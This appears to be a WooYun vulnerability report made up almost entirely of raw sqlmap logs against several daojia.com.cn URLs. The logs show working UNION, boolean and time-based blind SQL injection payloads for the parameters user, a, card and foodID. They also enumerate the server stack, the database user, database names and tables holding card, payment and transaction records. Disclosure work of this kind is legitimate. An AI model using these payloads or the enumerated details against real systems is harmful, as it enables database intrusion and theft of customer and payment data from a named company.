WooYun.org

http://b.daojia.com.cn/service.php?action=2147483649&user=admin&uid=1449954143596

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: user
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: action=2147483649&user=admin') UNION ALL SELECT NULL,NULL,CONCAT(0x
716f6e7671,0x504c416e6c645a785a43,0x7163666271),NULL#&uid=1449954143596
---
[11:16:41] [INFO] testing MySQL
[11:16:42] [INFO] confirming MySQL
[11:16:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
[11:16:42] [INFO] fetching current user
current user:    'daojia@10.1.1.%'
[11:16:42] [INFO] fetching current database
current database:    'daojia'
[11:16:42] [INFO] testing if current user is DBA
[11:16:42] [INFO] fetching current user
[11:16:42] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[11:20:53] [INFO] fetching database users
[11:20:53] [INFO] the SQL query used returns 1 entries
[11:20:53] [INFO] resumed: "'daojia'@'10.1.1.%'"
database management system users [1]:
[*] 'daojia'@'10.1.1.%'
[11:20:53] [INFO] fetching database names
[11:20:53] [INFO] the SQL query used returns 3 entries
[11:20:53] [INFO] starting 3 threads
[11:20:53] [INFO] resumed: "test"
[11:20:53] [INFO] resumed: "daojia"
[11:20:53] [INFO] resumed: "information_schema"
available databases [3]:
[*] daojia
[*] information_schema
[*] test
Database: test
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| blog_user                             | 1       |
+---------------------------------------+---------+
Database: daojia
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| bakTbl_Reconciliation20151022         | 982908  |
| Tbl_Reconciliation                    | 743209  |
| Tbl_UsedCard                          | 602351  |
| Tbl_CustomValueAccountTransaction     | 456038  |
| Tbl_SM                                | 442691  |
| Tbl_CardPayingRecord                  | 364366  |
| Tbl_Card                              | 311683  |
| Tbl_DepositTransaction                | 116940  |
| Tbl_CustomValueAccount                | 57413   |
| Tbl_Invite                            | 26148   |
| Tbl_RestaurantDelayedLog              | 5244    |
| Tbl_ToAuditCooperation                | 2984    |
| Tbl_ServiceMan                        | 1780    |
| Tbl_GiftCardSubNumber                 | 1755    |
| Tbl_CardNoRange                       | 1206    |
| Tbl_Session                           | 1120    |
| Tbl_ServiceManAuditStat               | 487     |
| Tbl_CardPatch                         | 461     |
| Tbl_DaoJiaAccountStat                 | 334     |
| Tbl_ToAuditCard                       | 177     |
| Tbl_FilesUploadLog                    | 168     |
| Tbl_Area                              | 145     |
| Tbl_Third_Delivery_Config             | 137     |
| Tbl_GiftCard                          | 108     |
| Tbl_InviteStat                        | 86      |
| Tbl_Config                            | 76      |
| Tbl_Province                          | 34      |
| Tbl_City                              | 11      |
| Tbl_CardCatagory                      | 9       |
| Tbl_UpgradeLog                        | 8       |
+---------------------------------------+---------+

GET parameter 'user' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] n
sqlmap identified the following injection points with a total of 469 HTTP(s) req
uests:
---
Place: GET
Parameter: user
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: action=2147483649&user=admin') UNION ALL SELECT NULL,NULL,CONCAT(0x
7165676f71,0x5563637a5a6d794d5245,0x7178667071),NULL#&uid=1449954143596
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=2147483649&user=admin') AND 1060=BENCHMARK(5000000,MD5(0x574
e446f)) AND ('ByJf'='ByJf&uid=1449954143596
---
[12:26:43] [INFO] testing MySQL
[12:26:43] [INFO] confirming MySQL
[12:26:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
[12:26:43] [INFO] fetching current user
current user:    'daojia@10.1.1.%'
[12:26:43] [INFO] fetching current database
current database:    'daojia'
[12:26:43] [INFO] testing if current user is DBA
[12:26:43] [INFO] fetching current user
[12:26:44] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False

http://beijing.daojia.com.cn/combo_list.php?a=2

[17:00:37] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
you provided a HTTP Cookie header value. The target URL provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n]
[17:00:39] [INFO] target URL is stable
sqlmap got a 302 redirect to 'http://beijing.daojia.com.cn:80/index.html'. Do yo
u want to follow? [Y/n]
[17:00:41] [WARNING] heuristic (basic) test shows that GET parameter 'a' might n
ot be injectable
[17:00:41] [INFO] testing for SQL injection on GET parameter 'a'
[17:00:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:01:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[17:02:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[17:03:52] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY o
r GROUP BY clause (RLIKE)'
[17:04:57] [INFO] testing 'Generic boolean-based blind - Parameter replace (orig
inal value)'
[17:04:58] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
ET - original value)'
[17:05:00] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT -
original value)'
[17:05:01] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i
nt - original value)'
[17:05:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[17:05:04] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (
original value)'
[17:05:06] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c
lauses'
[17:05:09] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c
lauses (original value)'
[17:05:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER
 BY clauses'
[17:05:15] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER
BY clauses'
[17:05:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:05:32] [INFO] GET parameter 'a' seems to be 'MySQL > 5.0.11 AND time-based b
lind' injectable
[17:05:32] [INFO] checking if the injection point on GET parameter 'a' is a fals
e positive
GET parameter 'a' is vulnerable. Do you want to keep testing the others (if any)
? [y/N] n
sqlmap identified the following injection points with a total of 386 HTTP(s) req
uests:
---
Place: GET
Parameter: a
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: a=2 AND SLEEP(5)
---
[17:06:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.41, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[17:06:20] [INFO] fetching current user
[17:06:20] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[17:06:20] [INFO] retrieved:
[17:06:20] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
daojia@10.1.1.%
current user:    'daojia@10.1.1.%'
[17:11:55] [INFO] fetching current database
[17:11:56] [INFO] retrieved: daojia
current database:    'daojia'
[17:14:10] [INFO] testing if current user is DBA
[17:14:10] [INFO] fetching current user
current user is DBA:    False

http://beijing.daojia.com.cn/service.php?action=1879048193&card=111111

[17:39:54] [INFO] loading tamper script 'space2comment'
[17:39:55] [INFO] testing connection to the target URL
[17:39:56] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[17:39:57] [INFO] target URL is stable
[17:39:57] [WARNING] heuristic (basic) test shows that GET parameter 'card' migh
t not be injectable
[17:39:57] [INFO] testing for SQL injection on GET parameter 'card'
[17:39:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:39:58] [INFO] GET parameter 'card' seems to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable
[17:39:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[17:39:59] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:39:59] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[17:40:11] [INFO] GET parameter 'card' seems to be 'MySQL > 5.0.11 AND time-base
d blind' injectable
[17:40:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[17:40:11] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[17:40:11] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[17:40:12] [INFO] target URL appears to have 5 columns in query
[17:40:14] [INFO] GET parameter 'card' is 'MySQL UNION query (NULL) - 1 to 20 co
lumns' injectable
GET parameter 'card' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] n
sqlmap identified the following injection points with a total of 30 HTTP(s) requ
ests:
---
Place: GET
Parameter: card
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=1879048193&card=111111 AND 4490=4490
    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: action=1879048193&card=-9445 UNION ALL SELECT NULL,NULL,NULL,NULL,C
ONCAT(0x71736a6871,0x447963734f69744a5270,0x71646f6a71)#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=1879048193&card=111111 AND SLEEP(5)
---
[17:40:17] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[17:40:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.41, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[17:40:17] [INFO] fetching current user
current user:    'daojia@10.1.1.%'
[17:40:17] [INFO] fetching current database
current database:    'beijing'
[17:40:18] [INFO] testing if current user is DBA
[17:40:18] [INFO] fetching current user
current user is DBA:    False

http://beijing.daojia.com.cn/review.php?a=67&r=2337

sqlmap identified the following injection points with a total of 930 HTTP(s) req
uests:
---
Place: GET
Parameter: a
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: a=67 AND SLEEP(5)&r=2337
---
[18:25:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.41, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[18:25:09] [INFO] fetching current user
[18:25:09] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[18:25:09] [INFO] retrieved:
[18:25:09] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
d
[18:26:12] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[18:26:12] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[18:26:19] [ERROR] invalid character detected. retrying..
[18:26:19] [WARNING] increasing time delay to 6 seconds
aojia@10.1.1.%
current user:    'daojia@10.1.1.%'
[18:32:24] [INFO] fetching current database
[18:32:24] [INFO] retrieved: daojia
[18:35:07] [ERROR] invalid character detected. retrying..
[18:35:07] [WARNING] increasing time delay to 7 seconds
current database:    'daojia'
[18:35:12] [INFO] testing if current user is DBA
[18:35:12] [INFO] fetching current user
current user is DBA:    False

http://beijing.daojia.com.cn/service.php?action=CANTURLFOODNUM&foodID=415041

[19:23:49] [INFO] loading tamper script 'between'
[19:23:49] [INFO] testing connection to the target URL
[19:24:00] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[19:24:01] [INFO] target URL is stable
[19:24:01] [WARNING] heuristic (basic) test shows that GET parameter 'foodID' mi
ght not be injectable
[19:24:01] [INFO] testing for SQL injection on GET parameter 'foodID'
[19:24:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:24:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:24:05] [INFO] testing 'MySQL inline queries'
[19:24:05] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:24:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:24:16] [INFO] GET parameter 'foodID' seems to be 'MySQL > 5.0.11 AND time-ba
sed blind' injectable
[19:24:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:24:16] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[19:24:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:24:22] [INFO] checking if the injection point on GET parameter 'foodID' is a
 false positive
GET parameter 'foodID' is vulnerable. Do you want to keep testing the others (if
 any)? [y/N] n
sqlmap identified the following injection points with a total of 85 HTTP(s) requ
ests:
---
Place: GET
Parameter: foodID
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=CANTURLFOODNUM&foodID=415041 AND SLEEP(5)-- ZtMW
---
[19:24:43] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[19:24:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.41, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[19:24:43] [INFO] fetching current user
[19:24:43] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[19:24:43] [INFO] retrieved:
[19:24:43] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[19:25:00] [INFO] adjusting time delay to 1 second due to good response times
daojia@10.1.1.%
current user:    'daojia@10.1.1.%'
[19:26:05] [INFO] fetching current database
[19:26:05] [INFO] retrieved: daojia
current database:    'daojia'
[19:26:32] [INFO] testing if current user is DBA
[19:26:32] [INFO] fetching current user
current user is DBA:    False